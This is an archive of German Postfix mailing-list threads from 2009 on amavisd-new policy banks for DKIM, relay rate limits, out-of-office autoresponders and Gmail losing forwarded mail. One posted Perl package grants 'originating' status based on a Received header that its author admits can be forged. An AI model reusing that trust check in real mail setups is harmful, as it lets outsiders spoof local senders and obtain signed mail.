From cite+postfix-buch at incertum.net Sat Aug 1 01:06:12 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Sat, 1 Aug 2009 01:06:12 +0200 Subject: [Postfixbuch-users] DKIM mit Amavis und Postfix funktioniert nicht In-Reply-To: <4A641738.2000007@fuerstenberg.ws> References: <4A60CBFB.6050108@heringa.de> <4A620102.2010903@heringa.de> <4A62C06B.3010601@fuerstenberg.ws> <200907191209.22280.p.heinlein@heinlein-support.de> <4A641738.2000007@fuerstenberg.ws> Message-ID: <20090731230612.GE11622@mail.incertum.net> Das schöne, wenn man auf solche uralten Mails antwortet ist, daß sie keiner mehr liest und man sich ziemlich weit aus dem Fenster lehnen kann. Zur Erinnerung: Es ging darum, ohne Trennung verschiedener Ports etc. in amavisd-new eine Policy zu laden, die $originating auf 1 setzt, wenn der Client sich per SASL authentifiziert hat. * Kai Fürstenberg wrote: > Peer Heinlein schrieb am 19.07.2009 12:09: >> Warum soll das nicht gehen? Wo steht denn das? Ich habe das zumindest >> noch nicht beobachten können, aber ich nutze aus verschiedenen Gründen >> in der Tat auch eigene Policy-Banks. [...] > > Mark hat auf jeden Fall auf der Amavis-Liste gesagt, dass MYUSERS erst > dann geladen wird, wenn $originating explizit auf 1 gesetzt wird. Die > andere Möglichkeit besteht darin, die IP-Adressen in @mynetworks > einzutragen. > > Damit Amavis aber nun nicht den ganzen IPv4-Adressraum als lokal > ansieht, bleibt nur noch, entweder den Port, oder die IP-Adresse des > Mailservers für ausgehende Mails zu ändern, und diese dann auf einen > separaten Amavis-Port weiterzuleiten wo dann in einer policy bank > $originating=1 gesetzt wird. Ja. Oder man hat ein Postfix, das RFC 3848 unterstützt (2.5+, glaube ich). Dann definiert man sich im amavisd-new: $policy_bank{'MINI-SUBMISSION'} = { originating => 1, }; Jetzt kann man amavisd-new überreden, diese Policy nachzuladen, wenn er vom eigenen Mailserver einen "Received:" header findet, der ESMTP(S)A enthält - dazu muß man ihm nur ein "custom package" unterschieben: package Amavis::Custom; use strict; BEGIN { import Amavis::Conf qw(:platform :confvars c cr ca $myhostname); import Amavis::Util qw(do_log untaint safe_encode safe_decode); import Amavis::rfc2821_2822_Tools; import Amavis::Notify qw(build_mime_entity); } sub new { my($class,$conn,$msginfo) = @_; my($self) = bless {}, $class; my $sasl_owned = 0; foreach my $line (@{$msginfo->{'orig_header'}}) { $line =~ s/\n\t/ /g; $sasl_owned = 1 if $line =~ m/^Received:.*by mail.incertum.net.*with ESMTP(S)?A.*/i; } if ($sasl_owned) { do_log(2, sprintf("Load SASL policy bank")); Amavis::load_policy_bank('MINI-SUBMISSION') } return $self; } 1; # insure a defined return Hier dürfte jetzt klar werden, warum man in der obigen Policy-Bank besser nicht allzuviele Settings aufweicht: So ein "Received:"-Header lässt sich nämlich beliebig fälschen und ich habe mir nicht die Mühe gemacht, darüber nachzudenken, ob man das mit Header/Body-Checks in den Griff kriegen kann. Den Code kann man mit ziemlicher Sicherheit, die RegExp mit absoluter Sicherheit noch verbessern. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #269: C - Nomic als Programmiersprache. (Florian Weimer) From postfix-list at novuage.de Sat Aug 1 14:03:32 2009 From: postfix-list at novuage.de (Sascha Peters) Date: Sat, 01 Aug 2009 14:03:32 +0200 Subject: [Postfixbuch-users] Versand an Relayserver limitieren, aber Mails von Clients trotzdem annehmen In-Reply-To: <200907301756.57608.p.heinlein@heinlein-support.de> References: <4A71BA2C.7090704@novuage.de> <200907301756.57608.p.heinlein@heinlein-support.de> Message-ID: <4A742F14.5000400@novuage.de> Peer Heinlein schrieb: >> Stimmt, daher wäre ein guter Provider Sinnvoll. Aber ansonsten >> versucht ja der Postfix selbst immer mal wieder die Mails >> loszuwerden, da braucht man ja nix mehr machen. Zwar sind die E-Mails >> dann viel später weg, und auch Reguläre werden in das Warnlimit von > > Nein. > > Versendet er 301 Mails, so wird er 3h gesperrt und schafft rund 8 x 300 > Mails = 2.400 Mails am Tag. > > Versendet er nur 300 Mails pro Viertelstunde sco schafft er 24 x 4 x 300 > Mails = 28.800 Mails am Tag. Mh, so hab ich das gar nicht gesehen... aber Du hast natürlich recht. -- Gruß Sascha From leo.unglaub at gmail.com Mon Aug 3 09:58:49 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 3 Aug 2009 09:58:49 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails Message-ID: Hallo Postfix-Freunde, ich muss leider erneut dieses leidige Thema aufgreifen. Ich selbst halte rein gar nichts von diesen Urlaubsbenarchitigungs-Mails. Wie Peer aber schon in seinem Buch geschrieben hat: Manche lieben sie, manche hassen sie. Ich hasse Sie, mein Chef liebt Sie und hat mir den Auftrag erteilt mal nachzuforschen ob sich so was bei uns auch Realisieren lässt. Fakt ist aber, mein Chef will so was haben also muss ich da irgend wie eine Lösung finden. Daher wollte ich euch nach eurer Meinung und Erfahrung fragen. Urlaubsbenachichtigungen für User in einem MySQL-Setup. Wie sollte ich/würdet ihr das angehen? Oder hat irgend wer von euch noch ein paar wirklich gute Gründe dagegen die ich Vorbringen könnte? Denn das mit den Mailinglisten zieht schlecht, da auser mir keiner weiß was das überhaupt ist. Hat irgend wer von euch noch ein paar andere Argumente dagegen? Denn das gemeine dabei ist ja, dass es nicht nur an meiner config liegt ob es gut geht oder nicht, sondern auch ein Stück an der des anderne Servers. Das heißt auch mein Richtiges Setup kann bei einem fehlerhaften externen Server zu großen Problemen führen. Vielen Dank schon jetzt! Viele Grüße Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Mon Aug 3 10:24:02 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 3 Aug 2009 10:24:02 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: Message-ID: <20090803082402.GA11105@charite.de> * Leo Unglaub : > Hallo Postfix-Freunde, > ich muss leider erneut dieses leidige Thema aufgreifen. Ich selbst halte > rein gar nichts von diesen Urlaubsbenarchitigungs-Mails. Wie Peer aber schon > in seinem Buch geschrieben hat: Manche lieben sie, manche hassen sie. Ich > hasse Sie, mein Chef liebt Sie und hat mir den Auftrag erteilt mal > nachzuforschen ob sich so was bei uns auch Realisieren lässt. Jeder liebt den Boss :) > Fakt ist aber, mein Chef will so was haben also muss ich da irgend wie > eine Lösung finden. Daher wollte ich euch nach eurer Meinung und > Erfahrung fragen. Urlaubsbenachichtigungen für User in einem > MySQL-Setup. Wie sollte ich/würdet ihr das angehen? Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am Tag (oder pro Woche). -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From mailing-lists at thomasschwenski.de Mon Aug 3 10:25:14 2009 From: mailing-lists at thomasschwenski.de (Thomas Schwenski) Date: Mon, 03 Aug 2009 10:25:14 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: Message-ID: <4A769EEA.5010208@thomasschwenski.de> Hallo Leo > Oder hat irgend wer von euch noch ein paar wirklich gute Gründe > dagegen die ich Vorbringen könnte? Gutes Gegenargument: Du wirst selbst zum Spammer. Jede Spammail, die dein System durchlässt, würde auch eine OoO-Notification auslösen. Bei einem gefakten Absender ... Ansonsten hast Du folgende Möglichkeiten: Soll die OoO-Notification einen Teil der auslösenden Mail (auch wenn's nur der Betreff ist) beinhalten benötigst Du entweder einen Content-Filter oder ein nachgelagertes Script (z.B. procmail). Wenn nicht, dann tut's auch ein eigener Policy-Daemon. (Der muss dann aber ziemlich genau in den smtpd_recipient_restrictions positioniert sein (vorher darf kein "OK" zurückgegeben werden, er muss aber nach allen abweisenden Restrictions kommen. Da die OoO-Notification meines Erachtens eine sehr niedrige Priorität haben, empfiehlt es sich diese per Script zu generieren um Ressourcen zu schonen. > Fakt ist aber, mein Chef will so was haben also muss ich da irgend wie > eine Lösung finden. Daher wollte ich euch nach eurer Meinung und > Erfahrung fragen. Urlaubsbenachichtigungen für User in einem > MySQL-Setup. Wie sollte ich/würdet ihr das angehen? Ich habe das bei mir so gelöst, dass ich in den virtual_alias_maps eine Weiterleitung auf die Empfängeradresse und eine generische Adresse habe, die per transport-Table an das Script zugestellt wird. > Vielen Dank schon jetzt! Kein Problem > Viele Grüße dito > Leo Thomas From mailing-lists at thomasschwenski.de Mon Aug 3 10:27:30 2009 From: mailing-lists at thomasschwenski.de (Thomas Schwenski) Date: Mon, 03 Aug 2009 10:27:30 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <20090803082402.GA11105@charite.de> References: <20090803082402.GA11105@charite.de> Message-ID: <4A769F72.9010704@thomasschwenski.de> Ralf Hildebrandt schrieb: > * Leo Unglaub : >> Hallo Postfix-Freunde, >> ich muss leider erneut dieses leidige Thema aufgreifen. Ich selbst halte >> rein gar nichts von diesen Urlaubsbenarchitigungs-Mails. Wie Peer aber schon >> in seinem Buch geschrieben hat: Manche lieben sie, manche hassen sie. Ich >> hasse Sie, mein Chef liebt Sie und hat mir den Auftrag erteilt mal >> nachzuforschen ob sich so was bei uns auch Realisieren lässt. > > Jeder liebt den Boss :) Hehe... >> Fakt ist aber, mein Chef will so was haben also muss ich da irgend wie >> eine Lösung finden. Daher wollte ich euch nach eurer Meinung und >> Erfahrung fragen. Urlaubsbenachichtigungen für User in einem >> MySQL-Setup. Wie sollte ich/würdet ihr das angehen? In Ergänzung meiner anderen Mail: > Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner > Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am > Tag (oder pro Woche). Das wäre dann Aufgabe des Scriptes in dem von mir beschriebenen Setup. Da muss man sich natürlich was vernünftiges basteln. Thomas From werner at aloah-from-hell.de Mon Aug 3 10:43:00 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Mon, 03 Aug 2009 10:43:00 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <20090803082402.GA11105@charite.de> References: <20090803082402.GA11105@charite.de> Message-ID: <4A76A314.6060904@aloah-from-hell.de> Ralf Hildebrandt schrieb: > * Leo Unglaub : >> Hallo Postfix-Freunde, >> ich muss leider erneut dieses leidige Thema aufgreifen. Ich selbst halte >> rein gar nichts von diesen Urlaubsbenarchitigungs-Mails. Wie Peer aber schon >> in seinem Buch geschrieben hat: Manche lieben sie, manche hassen sie. Ich >> hasse Sie, mein Chef liebt Sie und hat mir den Auftrag erteilt mal >> nachzuforschen ob sich so was bei uns auch Realisieren lässt. > > Jeder liebt den Boss :) > >> Fakt ist aber, mein Chef will so was haben also muss ich da irgend wie >> eine Lösung finden. Daher wollte ich euch nach eurer Meinung und >> Erfahrung fragen. Urlaubsbenachichtigungen für User in einem >> MySQL-Setup. Wie sollte ich/würdet ihr das angehen? > > Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner > Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am > Tag (oder pro Woche). > Hi, sofern du dovecot-deliver als LDA verwendest und Sieve aktiviert hast: mach's mit Sieve :-) Es gibt auch "fertige" Skripte wie YAA (Yet another Autoresponder) die auf Basis einer MySQL arbeiten, allerdings war bei Tests die Performance des Skripts (der Test liegt allerdings schon Jahre zurück) nicht überragend. Ggf. hat sich zwischenzeitlich ja etwas verbessert. Ciao, Werner From alexander.muth at lgb-rlp.de Mon Aug 3 10:39:53 2009 From: alexander.muth at lgb-rlp.de (Alexander Muth) Date: Mon, 03 Aug 2009 10:39:53 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <20090803082402.GA11105@charite.de> References: <20090803082402.GA11105@charite.de> Message-ID: <4A76A259.8070803@lgb-rlp.de> Ralf Hildebrandt schrieb: > Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner > Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am > Tag (oder pro Woche). > > und nicht auf Mails mit "Precedence: list" im Header antwortet From leo.unglaub at gmail.com Mon Aug 3 11:05:18 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 3 Aug 2009 11:05:18 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <4A76A314.6060904@aloah-from-hell.de> References: <20090803082402.GA11105@charite.de> <4A76A314.6060904@aloah-from-hell.de> Message-ID: Hallo ! Ich danke allen erst mal für eure Antworten. > Gutes Gegenargument: Du wirst selbst zum Spammer. > Jede Spammail, die dein System durchlässt, würde auch eine > OoO-Notification auslösen. > Bei einem gefakten Absender ... Das Argument dass man damit selbst zum Spammer wird habe ich bereits versucht, das wurde aber wie folgt gekontert: "Alle großen Firmen machen das doch auch". Das Stimmt zwar nicht, aber auf eine längere Diskussion wollte ich da dann nicht einsteigen. > Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner > Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am > Tag (oder pro Woche). Das mit dem "ein mal pro Tag" klingt nicht schlecht, allerdings bin ich mir da nicht sicher wie ich das mitloggen soll. Ich denke in "Echtzeit" wäre das einfacher zumachen. Andernfalls könnte man alle Absender mitloggen und dann abends einmal zusammenfassen lassen und dann verschicken. Ich werde dem nachgehen, mal schauen ob eine Perl Kentnisse dafür noch reichen. *g* > sofern du dovecot-deliver als LDA verwendest und Sieve aktiviert hast: > mach's mit Sieve :-) > > Es gibt auch "fertige" Skripte wie YAA (Yet another Autoresponder) die > auf Basis einer MySQL arbeiten, allerdings war bei Tests die Performance > des Skripts (der Test liegt allerdings schon Jahre zurück) nicht überragend. > Ggf. hat sich zwischenzeitlich ja etwas verbessert. Auf diesem Server habe ich keiner keine Dovecot drauf. Das läuft nur auf meinen Servern. Aber ich habe Cyrus und Sieve drauf laufen. Jedoch wusste ich nicht, dass Sieve irend wie mit MySQL Interaggieren kann. Zwar habe ich die Möglichkeit in Sieve selbst diese Meldungen zu generieren, aber ich glaube nicht, dass irgend jemand hier Sieve schreiben kann. (Also von den Mitarbeitern) Oder habe ich da einen Denkfehler drin? Ich bin gerade über das hier gestolpert und werde mir auch dieses Script mal anschauen. Allerdings finde ich es etwas komisch dafür die recipient_bcc_maps zu verwenden. Naja, mal schauen. Vielen Dank Leo From leo.unglaub at gmail.com Mon Aug 3 11:06:11 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 3 Aug 2009 11:06:11 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: <20090803082402.GA11105@charite.de> <4A76A314.6060904@aloah-from-hell.de> Message-ID: Hi, Link vergessen: http://www.cplinux.de/e-mail-server/virtual-vacation-mit-postfix-und-mysql.html > Ich bin gerade über das hier gestolpert und werde mir auch dieses > > Script mal anschauen. Allerdings finde ich es etwas komisch dafür die > > recipient_bcc_maps zu verwenden. Naja, mal schauen. > > > > Vielen Dank > > Leo > > > Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Mon Aug 3 11:08:18 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 3 Aug 2009 11:08:18 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: <20090803082402.GA11105@charite.de> <4A76A314.6060904@aloah-from-hell.de> Message-ID: <20090803090818.GM11105@charite.de> * Leo Unglaub : > > Ordentlich :) Also ein vacation, welches NUR auf Mails mit deiner > > Adresse im To:/CC: antwortet und nicht auf BULK Mails und nur 1x am > > Tag (oder pro Woche). > > > Das mit dem "ein mal pro Tag" klingt nicht schlecht, allerdings bin > ich mir da nicht sicher wie ich das mitloggen soll. Das machen alle vacation programme selber. -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From alexander.muth at lgb-rlp.de Mon Aug 3 11:13:50 2009 From: alexander.muth at lgb-rlp.de (Alexander Muth) Date: Mon, 03 Aug 2009 11:13:50 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: <20090803082402.GA11105@charite.de> <4A76A314.6060904@aloah-from-hell.de> Message-ID: <4A76AA4E.3010700@lgb-rlp.de> Leo Unglaub schrieb: > > Auf diesem Server habe ich keiner keine Dovecot drauf. Das läuft nur > auf meinen Servern. Aber ich habe Cyrus und Sieve drauf laufen. Jedoch > wusste ich nicht, dass Sieve irend wie mit MySQL Interaggieren kann. > Zwar habe ich die Möglichkeit in Sieve selbst diese Meldungen zu > generieren, aber ich glaube nicht, dass irgend jemand hier Sieve > schreiben kann. (Also von den Mitarbeitern) Oder habe ich da einen > Denkfehler drin? > > Ich bin gerade über das hier gestolpert und werde mir auch dieses > Script mal anschauen. Allerdings finde ich es etwas komisch dafür die > recipient_bcc_maps zu verwenden. Naja, mal schauen. > > wir machen das mit Cyrus / Sieve und als Benutzerschnittstelle SmartSieve. Das kann jeder ohne Einarbeitungszeit benutzen. Ist ein Smartsieve Webfrontend für Sieve Ist allerdings ohne Anbindung an MySql Alexander From postfixbuch at cboltz.de Mon Aug 3 13:47:39 2009 From: postfixbuch at cboltz.de (Christian Boltz) Date: Mon, 3 Aug 2009 13:47:39 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: Message-ID: <200908031347.39384@tux.boltz.de.vu> Hallo Leo, hallo Leute, Am Montag, 3. August 2009 schrieb Leo Unglaub: > Urlaubsbenachichtigungen für User in einem MySQL-Setup. Wie sollte > ich/würdet ihr das angehen? Ich würde Postfixadmin samt mitgeliefertem vacation.pl empfehlen. Das setzt natürlich voraus, dass Deine Datenbank die Feldnamen benutzt, die Postfixadmin gewohnt ist ;-) Gruß Christian Boltz -- Naja, lieber WAMP als WIMA (Windows, IIS, MicrosoftSQL, ActiveScript). Obwohl, das wäre wahrscheinlich ein ganz besonders sicherer Server, weil hinter allen Sicherheitslücken nur abstürzende Programme liegen. "Ich bin drin! Ups, da geht er hin..." };-> [Ratti] From listen at papernet.de Mon Aug 3 14:13:48 2009 From: listen at papernet.de (Matthias Ebner) Date: Mon, 3 Aug 2009 14:13:48 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <200908031347.39384@tux.boltz.de.vu> Message-ID: <001201ca1433$dbf36710$0601a8c0@emnpc2> Hallo, Was haltet ihr denn vom Goldfish Autoresponder-Script? Ich hab das auf einigen (Semi)Privaten Servern laufen und bis jetzt passt es eigentlich ganz gut (auch wenn ich ebenfalls kein Freund von Autorespondern (Stichwort: Kropf) bin). Gruß Matthias From lists at carsten-brandt.eu Mon Aug 3 16:50:04 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Mon, 03 Aug 2009 16:50:04 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> Message-ID: <4A76F91C.1010600@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Moin! Heute ein ähnliches Problem entdeckt. Matthias Ebner schrieb: > Im Log findet sich dann: > > Jul 12 23:52:40 servername postfix/smtp[28977]: BDA5662DA6: > to=, orig_to=, > relay=aspmx.l.google.com[72.14.221.114]:25, delay=0.39, > delays=0.09/0.01/0.06/0.23, dsn=2.0.0, status=sent (250 2.0.0 OK 1247435560 > 4si5398258fgg.22) > > Und Ende Gelände. Bei Google kommt davon nichts an. Jemand sendet von Gmail an eine Adresse bei mir, die auf seinen Gmail Account weiterleitet, also quasi über einen Umweg an sich selbst. Im Log sieht alles Okay aus, google hat die Mail angenommen, sie taucht aber im Postfach nirgens auf, genau wie bei dem schon beschriebenen Problem. Aug 3 14:25:07 hermes postfix/smtp[1587]: 3181C2BB20020: to=, orig_to=, relay=gmail-smtp-in.l.google.com[209.85.220.12]:25, delay=16, delays=15/0.11/0.19/1.2, dsn=2.0.0, status=sent (250 2.0.0 OK 1249309515 12si9421938fxm.5) Als ich mir allerdings das Log nochmal genauer angeschaut hab, hab ich folgendes entdeckt (direkt danach): Aug 3 14:25:07 hermes postfix/qmgr[17438]: 3181C2BB20020: removed soweit okay und logisch. Aber dann: Aug 3 14:25:21 hermes postfix/smtpd[32335]: timeout after END-OF-MESSAGE from mail-fx0-f217.google.com[209.85.220.217] Aug 3 14:25:21 hermes postfix/smtpd[32335]: disconnect from mail-fx0-f217.google.com[209.85.220.217] Eventuell hat sich der Gmail-Server nachdem er die Mail angenommen hat irgendwie aufgehängt und dabei vergessen sie zuzustellen...? hab google darauf mal unter http://mail.google.com/support/bin/request.py?contact_type=msgdelivery kontaktiert, mal schaun was bei rauskommt. MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKdvkX1cxPeQKB3GIRApfUAJ9BSoTjj6ZYTuiYYTYKnXf8LfieSgCeJtut LVCNBE6aAAntShLsa6Hu5v0= =XO/r -----END PGP SIGNATURE----- From thomas at gelf.net Mon Aug 3 15:54:15 2009 From: thomas at gelf.net (Thomas Gelf) Date: Mon, 03 Aug 2009 15:54:15 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: Message-ID: Weil wir gerade so schön am Autorespondern sind: mich würde echt mal interessieren, welche Autoresponder denn so genutzt werden?! Die, die jetzt laut "KEINE" schreien wollen: bitte haltet euch zurück, ich bin voll eurer Meinung - meine Frage ist aber dennoch ernst gemeint. Ich musste vor 'ner Weile mal wieder irgendwo einen Autoresponder einrichten und war mit so ziemlich allem was ich so auf dem "OSS-Markt" fand nicht sehr glücklich. Den vorhin erwähnten Goldfish kannte ich noch nicht - kann mich nach einem kurzen Blick darauf aber auch nicht wirklich dafür erwärmen. Hatte mir damals dann irgendwann RFC 3834 ausgedruckt, mich hingesetzt und ein klein wenig Code geschrieben. Man soll das Rad ja bekanntlich nicht neu erfinden, aber was soll's: war 'ne nette Übung und auch nicht sehr viel Arbeit. Das Skript machte in etwa folgendes: - Erhält Mail via STDIN oder auch aus Datei - Ermittelt den Return Path (Envelope From): via Kommandozeilen-Argument (z.B. von Postfix) oder aus Return-Path Header - Kein gültiger Return Path? Abbrechen! - Empfänger ermitteln (To, Cc, Bcc, Resent-To, Resent-Cc, Resent-Bcc werden ausgewertet) - keine Antwort wenn kein bekannter Empfänger (Aliases hierbei berücksichtigen!) in diesen Headern gefunden wurde - Keine Antwort an Mails mit Auto-Submitted oder Precedence Headern mit entsprechendem Inhalt - Keine Antwort an Mails mit List-* Headern - Keine Antwort an Mails mit well-known-Accounts im Local-Teil des Return Paths (root, www-data, nobody etc) - Keine Antwort wenn noreply@*, bounce@* und Varianten vorkommen - Prüfen, ob noch kein Reply in einem bestimmten Intervall (Tag, Woche) gesendet worden ist - Ziel-Adresse für Rückantwort (unter Berücksichtigung von Reply-To) er- mitteln - Reply, Urlaubsnachricht (was auch immer) versenden, mit entsprechenden Headern versehen - damit wir keine Antworten von anderen (korrekt konfigurierten) Autorespondern erhalten - Versand "vermerken", damit der Absender für 'ne Weile Ruhe vor unserem Autoresponder hat Soweit ich mich erinnere war's das auch schon. Jetzt zu meinen Fragen: - Was fehlt hier noch? Sicher jede Menge, bin schon gespannt! - Alle Autoresponder, die ich unter die Lupe genommen habe, waren um einiges unvollständiger als mein quick'n'dirty-Script. Kennt jemand ein richtig gutes Exemplar dieser Gattung? Mit liebem Gruß Thomas Gelf From p.heinlein at heinlein-support.de Mon Aug 3 17:43:04 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Mon, 3 Aug 2009 17:43:04 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <4A76F91C.1010600@carsten-brandt.eu> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <4A76F91C.1010600@carsten-brandt.eu> Message-ID: <200908031743.05237.p.heinlein@heinlein-support.de> Am Montag 03 August 2009 schrieb Carsten Brandt: > Jemand sendet von Gmail an eine Adresse bei mir, die auf seinen Gmail > Account weiterleitet, also quasi über einen Umweg an sich selbst. SPF Weiterleitungsproblematik? > Aug 3 14:25:21 hermes postfix/smtpd[32335]: timeout after > END-OF-MESSAGE from mail-fx0-f217.google.com[209.85.220.217] > Aug 3 14:25:21 hermes postfix/smtpd[32335]: disconnect from > mail-fx0-f217.google.com[209.85.220.217] Das ist smtp*d*. Sprich: Das ist nicht der Versand bei Dir, das ist ein Ermpfang von denen. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030-405051-42 Fax: 030-405051-19 Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From lists at carsten-brandt.eu Mon Aug 3 18:30:43 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Mon, 03 Aug 2009 18:30:43 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <200908031743.05237.p.heinlein@heinlein-support.de> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <4A76F91C.1010600@carsten-brandt.eu> <200908031743.05237.p.heinlein@heinlein-support.de> Message-ID: <4A7710B3.1000803@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Moin! Peer Heinlein schrieb: > Am Montag 03 August 2009 schrieb Carsten Brandt: > > >> Jemand sendet von Gmail an eine Adresse bei mir, die auf seinen Gmail >> Account weiterleitet, also quasi über einen Umweg an sich selbst. > > SPF Weiterleitungsproblematik? Kann gut sein, allerdings müssen sie, wenn sie es ablehnen, nen 5xx-Fehler zurückgeben und nicht "250 2.0.0 OK". Damit ist die Mail ja angenommen und muss zugestellt werden. Andere (nicht schöne) Möglichkeit wäre noch ein Bounce, aber den gibt es nicht. >> Aug 3 14:25:21 hermes postfix/smtpd[32335]: timeout after >> END-OF-MESSAGE from mail-fx0-f217.google.com[209.85.220.217] >> Aug 3 14:25:21 hermes postfix/smtpd[32335]: disconnect from >> mail-fx0-f217.google.com[209.85.220.217] > > Das ist smtp*d*. Sprich: Das ist nicht der Versand bei Dir, das ist ein > Ermpfang von denen. Au.. stimmt! hat somit also nix damit zu tun... MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKdxCx1cxPeQKB3GIRAofLAJsFC2L0lp2AjW2ZfpURG+7JmJCj7gCcDTPW oYyWrBjbWVJwin/C5/N8OaM= =JVpE -----END PGP SIGNATURE----- From p.heinlein at heinlein-support.de Mon Aug 3 21:26:53 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Mon, 3 Aug 2009 21:26:53 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <4A7710B3.1000803@carsten-brandt.eu> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <200908031743.05237.p.heinlein@heinlein-support.de> <4A7710B3.1000803@carsten-brandt.eu> Message-ID: <200908032126.53822.p.heinlein@heinlein-support.de> Am Montag, 3. August 2009 schrieb Carsten Brandt: > Kann gut sein, allerdings müssen sie, wenn sie es ablehnen, nen > 5xx-Fehler zurückgeben und nicht "250 2.0.0 OK". Damit ist die Mail ja > angenommen und muss zugestellt werden. Andere (nicht schöne) > Möglichkeit wäre noch ein Bounce, aber den gibt es nicht. GMX nimmt mit einem 250er an und packt es dann in den Spamverdachtsordner. Dumm nur, wenn man POP3 nutzt. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From lists at carsten-brandt.eu Mon Aug 3 22:53:24 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Mon, 03 Aug 2009 22:53:24 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <200908032126.53822.p.heinlein@heinlein-support.de> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <200908031743.05237.p.heinlein@heinlein-support.de> <4A7710B3.1000803@carsten-brandt.eu> <200908032126.53822.p.heinlein@heinlein-support.de> Message-ID: <4A774E44.3010102@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Peer Heinlein schrieb: > Am Montag, 3. August 2009 schrieb Carsten Brandt: > >> Kann gut sein, allerdings müssen sie, wenn sie es ablehnen, nen >> 5xx-Fehler zurückgeben und nicht "250 2.0.0 OK". Damit ist die Mail ja >> angenommen und muss zugestellt werden. Andere (nicht schöne) >> Möglichkeit wäre noch ein Bounce, aber den gibt es nicht. > > GMX nimmt mit einem 250er an und packt es dann in den Spamverdachtsordner. Thx für die Info. > Dumm nur, wenn man POP3 nutzt. Okay, das ist in der Tat ein wenig dumm, aber sie taucht wenigstens auf. Die besagten Mails sind bei Google allerdings nirgens zu finden, weder in Inbox, Spam oder Trash. MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 